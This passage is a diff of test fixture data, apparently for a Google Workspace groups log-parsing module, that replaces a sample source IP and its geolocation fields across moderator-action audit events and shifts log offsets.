- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -490,26 +458,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 3429,
+ "log.offset": 3421,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -531,7 +495,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "creation",
@@ -548,26 +512,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 3998,
+ "log.offset": 3989,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -589,7 +549,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -607,26 +567,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 4466,
+ "log.offset": 4456,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -648,7 +604,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "deletion",
@@ -665,26 +621,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 4983,
+ "log.offset": 4972,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -706,7 +658,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -724,26 +676,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 5454,
+ "log.offset": 5442,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -765,7 +713,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -783,26 +731,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 6027,
+ "log.offset": 6014,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -824,7 +768,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -842,26 +786,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 6602,
+ "log.offset": 6588,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -883,7 +823,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -901,26 +841,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 7218,
+ "log.offset": 7203,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -941,7 +877,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}",
 "event.outcome": "success",
 "event.provider": "groups",
 "event.type": [
@@ -960,26 +896,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 7759,
+ "log.offset": 7743,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1000,7 +932,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}",
 "event.outcome": "success",
 "event.provider": "groups",
 "event.type": [
@@ -1018,27 +950,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 8282,
+ "log.offset": 8265,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1064,7 +992,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "creation",
@@ -1082,27 +1010,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 8760,
+ "log.offset": 8742,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1128,7 +1052,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "group",
@@ -1146,27 +1070,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 9228,
+ "log.offset": 9209,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
